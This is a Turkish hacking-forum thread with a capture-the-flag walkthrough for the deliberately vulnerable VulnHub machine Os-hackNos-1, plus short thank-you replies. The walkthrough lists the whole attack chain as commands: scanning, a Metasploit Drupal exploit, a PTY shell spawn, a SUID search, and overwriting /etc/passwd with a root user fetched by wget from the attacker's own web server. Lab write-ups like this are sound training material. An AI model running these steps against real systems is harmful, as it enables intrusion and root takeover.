THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

hackNos: Os-hackNos-1 Zafiyetli Makinenin Çözümü //By Ghost

By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
24
Mesajlar:
939
Konular:
144
Teşekkür (Etti):
400
Teşekkür (Aldı):
457
Ticaret:
(0) %
5
1892
10-12-2019 22:40
#1
Merhabalar herkese. Bu yazıda sizlerle beraber hackNos: Os-hackNos-1 zafiyetli makinenin çözümünü inceleyeceğiz.

https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

Makine ismi: Os-hackNos-1

Yayınlanma Tarihi: 27 Kasım 2019

Yapan: Rahul Gehlaut

Boyut/Format: 827mb/OVA

Zorluk: Kolay-Orta

İşletim Sistemi: Linux

Seri: hackNos

Açıklama: Makinedeki 2 flag dosyasını bul. (UserFlag-RootFlag)

Not: Başlamadan önce belirtmek isterim. İndirdiğiniz makine VMware 'da düzgün çalışmayacaktır. VirtualBox üzerinden CTF'i çözmenizi öneririm.

İlk önce makinemizin ip adresini öğrenmek için "netdiscover" komutunu kullanıyoruz.IP adresini öğrendikten sonra açık portları öğrenmek için nmap taraması yapalım.
Kod:
nmap -A -p- 192.168.1.51Zafiyetli makinemizde sadece ssh (22) ve http (80) portlarımız açıkmış. 80 portu bildiğiniz üzere bir web sitesinin olduğunu gösteriyor. Bakalım site nasıl bişi.Karşımıza çıkan sayfa pekte sevindirici olmadı. "Ubuntu Default Page" bize bişi ifade etmiyor. Bizde dizin taraması yapalım. Belki işe yarar bi klasör veya dosya buluruz. Dizin taraması için terminale dirbuster yazabilirsiniz. Ya da menüden tıklayıp açabilirsiniz.
Target kısmına hedef ip adresini (http ile beraber), wordlistimizi ve sağ alttaki "File extension" kısmına dosya türlerini giriyoruz. Dizin tarama işlemine geçebiliriz.
Bizim için önemli olan ilk 4 taramadan dönen veriler. Bu yüzden diğerlerini bitirmeye aldım. Bu tarama esnasında karşılaştığım bir probleme de değineyim. Error kısmı var. Ard arda 20'den fazla error oluşursa tarama kendini durduruyor. Bu yüzden sol alttan Pause tuşuna basıp devam etmesini sağlamalısınız. Tarama bitince "Results" kısmından dizin tarama sonuçlarımıza bakalım.Güzel sonuçlar dönmeye başladı yavaştan. Tarama sonuçlarından 2 tane önemli bilgi döndü gibi duruyor. 'alexander.txt' dosyası tespit etti ve yanında 'drupal' klasörü. Drupal bilmeyenler için söyleyelim wordpress gibi içerik yönetmek için oluşturulmuş bir yazılımdır.
Bulduğumuz dizin ve dosyamızı tarayıcımızda açalım bakalım neler göreceğiz.
Drupal klasik bir görünüme sahip. Şimdilik onu kenarda bekletelim. Zira alexander isimli dosyamızda bir karmaşık metin ile karşılaşıyoruz. İlk baktığımızda bir şifreleme olduğunu anlıyoruz. Şifre çözme sitelerine bi uğrayalım
https://gchq.github.io/CyberChef/CyberChef online decode sitesidir. Input kısmına alexander dosyamızdan çıkan metni yapıştırdıktan sonra Output kısmına sihirbaz çubuğu çıkıyor. Ona tıklayınca decode işlemini gerçekteştiriyor. Decode işleminden sonra yine karmaşık bir ifade ile karşı karşıyayız. Kripto ve şifreleme ile uğraşan arkadaşlar çıkan sonucun hangi şifreleme olduğunu anlamıştır ama biz bilmeyenler için diğer sitemizden de gösterelim. Dcode sitemize gidelim.
https://www.dcode.fr/enİlk decode işleminden çıkan karmaşık ifadeyi burada search kısmına yapıştırıp go derseniz size hash türünü gösteriyor (sol üstteki). Tabi bu her zaman geçerli bi durum değil ama çoğu zaman size yardımcı olabiliyor. Çözmemiz gereken şifreleme türü Brain.. isimli olan. Brain.. üzerine tıklayıp şifremizi çözmeye gidelim.Çıkan sonuç güzel. Zira bize kullanıcı adı ve şifre verdi. Şimdi bunun neye ait olduğunu düşünmem lazım. İlk akla gelenleri test etmek iyi olur. Hatırlayın drupal yazılımı web servisimizde yüklüydü. drupal linkine geri dönüp kullanıcı adı ve şifremizi deneyelimKullanıcı adı ve parola kısmına dcode'da çözümlediğimiz bilgileri girince drupal bilgileri olduğu anlaşıldı. Ama bu bilgiler aynı zamanda sisteme bağlantı sağlayabileceğimiz bilgiler de olabilir. O yüzden nolur nolmaz diyip ssh bağlantısı da denemekten zarar gelmez.Bilgileri girdiğimde hata aldım. Malesef bulduğumuz bilgiler sadece drupal sistemine ait gibi duruyor. Kenarda dursun belki işe yarar ilerde. Drupal sistemi üzerinden de bişi bulamadım. O yüzden birde exploit bakalım. Terminale 'msfconsole' yazarak m3t4sploitimizi açalım. Ardından drupal için search yapalım.
Kod:
search drupal
Kod:
use 4İlk başta 3 numaralı ve 5 numaralı exploitler remote ile alakalı olduğu için onları denedim. Lakin onlar bi sonuç vermediği için burada sadece çalışan 4 no'lu exploiti gösteriyorum. show options komutu ile gerekli özellikleri listeliyoruz. Sırasıyla bilgilerimizi girip exploitimizi deneyeceğiz.
Kod:
set RHOSTS 192.168.1.51

Kod:
set TARGETURI /drupal

Kod:
runmeterpreter yazısını gördük içerideyiz artık shell komutu ile karşı taraftan shell döndürüyoruz. komut çalıştırabilmemiz için shell'e ihtiyacımız var. Birde bash shell üzerinde çalışmak için her zamanki komutumuzu yazalım
Kod:
python3 -c 'import pty;pty.spawn("/bin/bash")'

Kim olduğumuzu hangi dizinde olduğumuzu öğrendikten sonra ilk flag dosyamızı ekranda gösterelimŞimdi sırada /root dizini altındaki son flagımızı açmak. Tabi bunu yapmak için yetki yükseltme işlemine ihtiyacımız var. Sistemde yetkimiz olmadığı halde çalıştırılabilir uygulamaları arayalım
Kod:
find / -type f -perm -u=s 2>/dev/nullwget komutu dikkatimizi çekiyor. Zira yetkimiz olmasa bile istediğimiz yere bi dosya indebiliriz. Buda şu anlama gelebiliyor. /etc dizin altındaki 'passwd' dosyasını değiştirmek için wget'i kullanabilirim. Ama ilk önce sistemin /etc/passwd dosyasını okuyalım
Kod:
cat /etc/passwdBu bilgileri bir yere kaydedelim. Şimdi openssl ile passwd dosyasına uygun kullanıcı oluşturalım.
Kod:
openssl passwd -1 -salt byghost H4ck3njoyŞimdi yeni bir passwd dosyası oluşturup zafiyetli makinemizden aldığımız passwd bilgilerini ile beraber bizim oluşturduğumuz kullanıcı bilgilerini birleştirelim.
Kod:
ghost:OPENSSL_UZERINDEN_OLUSAN_KEY:0:0:,,,/root:/bin/bashŞimdi bu dosyamızı sızdığımız makinemize indirmemiz gerekiyor. Bunun için de bir Web servise ihtiyacımız var. Ayrı bi konuda buna daha detaylı değineceğim. Şimdilik sadece terminale aşağıdaki komutu girelim.
Kod:
python -m SimpleHTTPServer 8000Tarayıcıya kendi ipnizi ve 8000 portunuzu yazarsanız web servisi başlattığınızı göreceksiniz.
Kod:
IP_ADRESINIZ:8000/Şimdi sızdığım sisteme geri dönüp wget ile passwd dosyamızı indirelim. Ama ilk önce /etc dizini altında olduğunuzdan emin olun.
Kod:
cd /etc

Kod:
wget IP_ADRESINIZ:8000/passwd -O passwd

Kod:
su ghostGördüğünüz gibi oluşturduğumuz kullanıcıya geçtiğimizde root yetkisine geçiş yaptık. Artık son flag'ımızı gösterelim


H4ck3njoy

Elimden geldiğince çözümü anlatmaya çalıştım. Umarım faydalı ve doğru anlatabilmişimdir. Bir başka CTF çözümünde buluşmak üzere Allah'a emanet olun
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Konu By Ghost tarafından (10-12-2019 22:46 Saat 22:46 ) değiştirilmiştir.
Rumexus - ait Kullanıcı Resmi (Avatar)
Moderatör
Üyelik tarihi:
01/2016
Nereden:
7
Mesajlar:
1.823
Konular:
113
Teşekkür (Etti):
1065
Teşekkür (Aldı):
825
Ticaret:
(0) %
11-12-2019 13:10
#2
Ellerine sağlık ghost.
---------------------
Acizler için imkansız, korkaklar için inanılmaz gözüken şeyler kahramanlar için idealdir.
By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
24
Mesajlar:
939
Konular:
144
Teşekkür (Etti):
400
Teşekkür (Aldı):
457
Ticaret:
(0) %
11-12-2019 15:04
#3
Alıntı:
Rumexus´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık ghost.
Eyvallah beğenmenize sevindim
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Rumexus Teşekkür etti.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3705
Ticaret:
(0) %
11-12-2019 20:17
#4
Ellerine sağlık Ghost, çok iyi konu çıkarmışsın
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
By Ghost Teşekkür etti.
PourLa - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
03/2016
Nereden:
Mesajlar:
1.668
Konular:
310
Teşekkür (Etti):
630
Teşekkür (Aldı):
872
Ticaret:
(0) %
11-12-2019 23:21
#5
Ellerin dert görmesin
---------------------
PourLa
Html/Css > Python > C ve C++
( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram
By Ghost Teşekkür etti.
andro26 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2015
Nereden:
los encılıs
Mesajlar:
244
Konular:
11
Teşekkür (Etti):
35
Teşekkür (Aldı):
18
Ticaret:
(0) %
12-12-2019 01:21
#6
eline sağlık güzel anlatım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler